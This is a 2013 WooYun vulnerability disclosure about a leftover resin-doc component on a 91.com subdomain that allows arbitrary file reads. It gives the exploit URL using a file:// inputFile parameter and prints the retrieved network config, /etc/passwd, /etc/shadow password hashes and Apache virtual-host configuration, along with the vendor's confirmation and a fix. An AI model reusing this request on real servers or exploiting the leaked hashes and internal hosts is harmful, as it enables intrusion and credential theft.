当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040612

漏洞标题:91某分站中间件配置不当导致可读取服务器任意文件

相关厂商:福建网龙

漏洞作者: 猪猪侠

提交时间:2013-10-22 11:30

修复时间:2013-12-06 11:31

公开时间:2013-12-06 11:31

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-22: 细节已通知厂商并且等待厂商处理中
2013-10-22: 厂商已经确认,细节仅向厂商公开
2013-11-01: 细节向核心白帽子及相关领域专家公开
2013-11-11: 细节向普通白帽子公开
2013-11-21: 细节向实习白帽子公开
2013-12-06: 细节向公众公开

简要描述:

任意文件读取,表面上看上去危害不大,但是服务器上部署的都是很重要的分站,连邮件服务也在上面,要是结合其它边界漏洞利用,危害就可想而知了。

详细说明:

# resin-doc 默认服务未删除可读取任意文件
http://so.91.com/resin-doc/tutorial/jndi-appconfig/test?inputFile=file:////etc/sysconfig/network-scripts/ifcfg-eth0
so 应该是个很重要的域名

inputFile: file:////etc/sysconfig/network-scripts/ifcfg-eth0
# Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet
DEVICE=eth0
HWADDR=00:1e:4f:43:c2:51
ONBOOT=yes
NETMASK=255.255.255.192
IPADDR=121.207.254.76
GATEWAY=121.207.254.65
TYPE=Ethernet
back to demo


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
fax:x:78:78:mgetty fax spool user:/var/spool/fax:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
radiusd:x:95:95:radiusd user:/:/bin/false
exim:x:93:93::/var/spool/exim:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pvm:x:24:24::/usr/share/pvm3:/bin/bash
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
privoxy:x:73:73::/etc/privoxy:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ident:x:98:98::/home/ident:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
jf91:x:500:500::/home/httpd/html/:/sbin/nologin
wlin:x:501:501::/home/httpd/html/test:/sbin/nologin
mongodb:x:20001:20001::/home/mongodb:/bin/bash
sody:x:20002:20002::/home/httpd/html/so.dy.com.cn:/bin/bash
so91:x:20003:20003::/home/httpd/html/so.91.com:/sbin/nologin

漏洞证明:

# 进一步证明
shadow

root:$1$wkW42tNvYPeKoPYqSJeux7t/:14077:0:99999:7:::
bin:*:14070:0:99999:7:::
daemon:*:14070:0:99999:7:::
adm:*:14070:0:99999:7:::
lp:*:14070:0:99999:7:::
sync:*:14070:0:99999:7:::
shutdown:*:14070:0:99999:7:::
halt:*:14070:0:99999:7:::
mail:*:14070:0:99999:7:::
news:*:14070:0:99999:7:::
uucp:*:14070:0:99999:7:::
operator:*:14070:0:99999:7:::
games:*:14070:0:99999:7:::
gopher:*:14070:0:99999:7:::
ftp:*:14070:0:99999:7:::
nobody:*:14070:0:99999:7:::
dbus:!!:14070:0:99999:7:::
distcache:!!:14070:0:99999:7:::
ais:!!:14070:0:99999:7:::
nscd:!!:14070:0:99999:7:::
ldap:!!:14070:0:99999:7:::
vcsa:!!:14070:0:99999:7:::
squid:!!:14070:0:99999:7:::
fax:!!:14070:0:99999:7:::
pcap:!!:14070:0:99999:7:::
cyrus:!!:14070:0:99999:7:::
ntp:!!:14070:0:99999:7:::
apache:!!:14070:0:99999:7:::
rpm:!!:14070:0:99999:7:::
named:!!:14070:0:99999:7:::
rpc:!!:14070:0:99999:7:::
amanda:!!:14070:0:99999:7:::
postgres:!!:14070:0:99999:7:::
sshd:!!:14070:0:99999:7:::
radiusd:!!:14070:0:99999:7:::
exim:!!:14070:0:99999:7:::
mysql:!!:14070:0:99999:7:::
mailnull:!!:14070:0:99999:7:::
smmsp:!!:14070:0:99999:7:::
pvm:!!:14070:0:99999:7:::
mailman:!!:14070:0:99999:7:::
quagga:!!:14070:0:99999:7:::
dovecot:!!:14070:0:99999:7:::
webalizer:!!:14070:0:99999:7:::
privoxy:!!:14070:0:99999:7:::
radvd:!!:14070:0:99999:7:::
avahi:!!:14070:0:99999:7:::
rpcuser:!!:14070:0:99999:7:::
nfsnobody:!!:14070:0:99999:7:::
postfix:!!:14070:0:99999:7:::
ident:!!:14070:0:99999:7:::
pegasus:!!:14070:0:99999:7:::
tomcat:!!:14070:0:99999:7:::
xfs:!!:14070:0:99999:7:::
haldaemon:!!:14070:0:99999:7:::
gdm:!!:14070:0:99999:7:::
sabayon:!!:14070:0:99999:7:::
jf91:$1$6laF/Eof$IlQn0SawWnxT..:14077:0:99999:7:::
wlin:$1$7bkp2E9i$J.o7i4bufWYDGP5H/:14245:0:99999:7:::
mongodb:$1$J9IV9Y.K$y7zlSVf7VpZhzmb70:15037:0:99999:7:::
sody:$1$QBIUYkro$Ye.EmreESby8g9A0:15264:0:99999:7:::
so91:$1$rxH3IVAY$ZD1X1PiSE76BaCT/:15823:0:99999:7:::


inputFile: file:////usr/local/apache2/conf/extra/httpd-vhosts.conf
#
# Virtual Hosts
#
# If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at 
# 
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.
#
# Use name-based virtual hosting.
#
NameVirtualHost 121.207.254.76
NameVirtualHost 192.168.33.76
#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
# The first VirtualHost section is used for all requests that do not
# match a ServerName or ServerAlias in any  block.
#
#
#    ServerAdmin webmaster@dummy-host.example.com
#    DocumentRoot "/www/docs/dummy-host.example.com"
#    ServerName dummy-host.example.com
#    ServerAlias www.dummy-host.example.com
#    ErrorLog "logs/dummy-host.example.com-error_log"
#    CustomLog "logs/dummy-host.example.com-access_log common"
#
#
#    ServerAdmin webmaster@dummy-host2.example.com
#    DocumentRoot "/www/docs/dummy-host2.example.com"
#    ServerName dummy-host2.example.com
#    ErrorLog "logs/dummy-host2.example.com-error_log"
#    CustomLog "logs/dummy-host2.example.com-access_log common"
#
    ServerAdmin admin@mmosite.com                                                                                 
    DocumentRoot /home/httpd/html/pz.91.com/webapps                                                                       
    ServerName pz.91.com                                                                                          
    ErrorDocument 404 "/404.php" 
Header set Cache-Control no-cache
                                                              
#    CustomLog "|/usr/local/apache2/bin/rotatelogs /opt/logs/httpd/pz.91.com-access_log.%Y%m%d 86400" combined    
#    ErrorLog  "|/usr/local/apache2/bin/rotatelogs /opt/logs/httpd/pz.91.com-error_log.%Y%m%d 86400"              
                                                                                                    
                                                                                                                  
                                                                                      
    ServerAdmin admin@mmosite.com                                                                                 
    DocumentRoot /home/httpd/html/report.help.91.com                                                              
    ServerName report.help.91.com                                                                                 
    ErrorDocument 404 http://www.91.com/error                                                              
                                                                                                    
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/zc.91.com/webapps
    ServerName zc.91.com
    ErrorDocument 404 http://www.91.com/error
                                                                                                                  
                                                                                      
    ServerAdmin admin@mmosite.com                                                                                 
    DocumentRoot /home/httpd/html/tp.91.com/webapps                                                                  
    ServerName tp.91.com                                                                                          
    ErrorDocument 404 http://www.91.com/error
Header set Cache-Control no-cache
                                                              
#    CustomLog "|/usr/local/apache2/bin/rotatelogs /opt/logs/httpd/tp.91.com-access_log.%Y%m%d 86400" combined    
#    ErrorLog  "|/usr/local/apache2/bin/rotatelogs /opt/logs/httpd/tp.91.com-error_log.%Y%m%d 86400"              
                                                                                                    
                                                                                                                  
                                                                                      
    ServerAdmin admin@mmosite.com                                                                                 
    DocumentRoot /home/httpd/html/click.91.com                                                                    
    ServerName click.91.com                                                                                       
    ServerAlias click1.91.com                                                                                     
                                                                                                    
#
#    ServerAdmin admin@mmosite.com
#    DocumentRoot /home/httpd/html/so.91.com
#    ServerName so.91.com
#    AddDefaultCharset   UTF-8
#    ErrorDocument 404 http://www.91.com/error
#    ResinConfigServer 192.168.33.76 6802
#    CauchoStatus yes
#
#   Options Includes FollowSymLinks
#   AllowOverride All
#
#FilesMatch "\.shtml">
#Header set Cache-Control no-cache
#
#CustomLog "|/usr/local/apache2/bin/rotatelogs /home/httpd/html/so.91.com/so.91.com-access_log.%Y%m%d 86400" combined
#ErrorLog  "|/usr/local/apache2/bin/rotatelogs /home/httpd/html/so.91.com/so.91.com-error_log.%Y%m%d 86400"
#                                                                                                                  
 
       ServerAdmin admin@mmosite.com 
       DocumentRoot /home/httpd/html/search.nd.com.cn 
       ServerName search.nd.com.cn 
       ResinConfigServer 192.168.33.76 6802 
       CauchoStatus yes 
                                                                                                    
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/so.dy.com.cn
    ServerName so.dy.com.cn
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
    AddDefaultCharset   UTF-8
Header set Cache-Control no-cache
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/so.dy.com.cn
    ServerName so.dy.com.cn
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
    AddDefaultCharset   UTF-8
Header set Cache-Control no-cache
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/rss.dy.com.cn/webapps
    ServerName rss.dy.com.cn
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/rss.dy.com.cn/webapps
    ServerName rss.dy.com.cn
	ServerAdmin admin@mmosite.com
	DocumentRoot /home/httpd/html/irmail.nd.com.cn    
	ServerName irmail.nd.com.cn
       # AddDefaultCharset gb2312
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/pz.91.com/webapps
    ServerName pz.91.com
    ErrorDocument 404 "/404.php" 
Header set Cache-Control no-cache
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/tp.91.com/webapps
    ServerName tp.91.com
    ErrorDocument 404 http://www.91.com/error
Header set Cache-Control no-cache
 
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/report.help.91.com
    ServerName report.help.91.com
    ErrorDocument 404 http://www.91.com/error
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/zc.91.com/webapps
    ServerName zc.91.com
    ErrorDocument 404 http://www.91.com/error
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/click.91.com
    ServerName click.91.com
    ServerAlias click1.91.com
       ServerAdmin admin@mmosite.com
       DocumentRoot /home/httpd/html/search.nd.com.cn
       ServerName search.nd.com.cn
       ResinConfigServer 192.168.33.76 6802
       CauchoStatus yes
        ServerAdmin admin@mmosite.com
        DocumentRoot /home/httpd/html/irmail.nd.com.cn
        ServerName irmail.nd.com.cn
       # AddDefaultCharset gb2312
#
#    ServerAdmin admin@mmosite.com
#    DocumentRoot /home/httpd/html/so.91.com
#    ServerName so.91.com
#    ErrorDocument 404 http://www.91.com/error
#    ResinConfigServer 192.168.33.76 6802
#    CauchoStatus yes
#    AddDefaultCharset   UTF-8
#
#   Options Includes FollowSymLinks
#   AllowOverride All
#
#
#Header set Cache-Control no-cache
#
#
       ServerAdmin admin@mmosite.com
       DocumentRoot /home/httpd/html/cnsearch.91.com
       ServerName cnsearch.91.com
       ResinConfigServer 192.168.33.76 6802
       CauchoStatus yes
AddDefaultCharset   UTF-8
   Options Includes FollowSymLinks
   AllowOverride All
#CustomLog "|/usr/local/apache2/bin/rotatelogs /home/httpd/html/cnsearch.91.com/cnsearch.91.com-access_log.%Y%m%d 86400" combined
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/pz.dy.com.cn/webapps
    ServerName pz.dy.com.cn
    AddDefaultCharset   UTF-8
	Options Indexes FollowSymLinks MultiViews Includes
	AllowOverride all
	Order Deny,Allow
	Deny from all
	Allow from all
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/tp.dy.com.cn/webapps
    ServerName tp.dy.com.cn
    AddDefaultCharset   UTF-8
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/pz.dy.com.cn/webapps
    ServerName pz.dy.com.cn
    AddDefaultCharset   UTF-8
        Options Indexes FollowSymLinks MultiViews Includes
        AllowOverride all
        Order Deny,Allow
        Deny from all
        Allow from all
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/tp.dy.com.cn/webapps
    ServerName tp.dy.com.cn
    AddDefaultCharset   UTF-8
#
#    ServerAdmin admin@mmosite.com
#    DocumentRoot /home/httpd/html/searchservice.91.com
#    ServerName searchservice.91.com
#    ResinConfigServer 121.207.254.76 6802
#    CauchoStatus yes
#
#   deny from all
#   Options None
#   Order deny,allow
#
#
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/searchservice.91.com
    ServerName searchservice.91.com
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
AddDefaultCharset   UTF-8
   Options Includes FollowSymLinks
   AllowOverride All
   deny from all
   Options None
   Order deny,allow
       ServerAdmin admin@mmosite.com
       DocumentRoot /home/httpd/html/cnsearch.91.com
       ServerName cnsearch.91.com
#       ResinConfigServer 121.207.254.76 6802
#       CauchoStatus yes
AddDefaultCharset   UTF-8
   Options Includes FollowSymLinks
   AllowOverride All
       ResinConfigServer 192.168.33.76 6802
       CauchoStatus yes
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/p.33669.com/webapps
    ServerName p.33669.com
    AddDefaultCharset   UTF-8
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/p.33669.com/webapps
    ServerName p.33669.com
    AddDefaultCharset   UTF-8
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/t.33669.com/webapps
    ServerName t.33669.com
    AddDefaultCharset   UTF-8
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/t.33669.com/webapps
    ServerName t.33669.com
    AddDefaultCharset   UTF-8
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/s.33669.com
    ServerName s.33669.com
#
#   Options Includes FollowSymLinks
#   AllowOverride All
#
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
SetEnvIfNoCase Referer "^http://.*\.33669\.com" local_ref=1
Order Allow,Deny
Allow from env=local_ref
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/s.33669.com
    ServerName s.33669.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/kw.so.91.com/kwsearch
    ServerName kw.so.91.com
    ServerAlias kw.s.81813.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/kw.so.91.com/kwsearch
    ServerName kw.so.91.com
    ServerAlias kw.s.81813.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/api.mobile.33669.com
    ServerName api.mobile.33669.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/so.91.com
    ServerName so.91.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/so.91.com
    ServerName so.91.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/test.91.com
    ServerName test.91.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
    ServerAdmin admin@mmosite.com
    DocumentRoot /home/httpd/html/test.91.com
    ServerName test.91.com
    AddDefaultCharset   UTF-8
    ResinConfigServer 192.168.33.76 6802
    CauchoStatus yes
CauchoConfigCacheDirectory /tmp
back to demo

修复方案:

# 删除resin-doc,然后对其它服务器全面排查!

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-22 15:56

厂商回复:

感谢 猪猪侠 提交的漏洞,已安排处理

最新状态:

暂无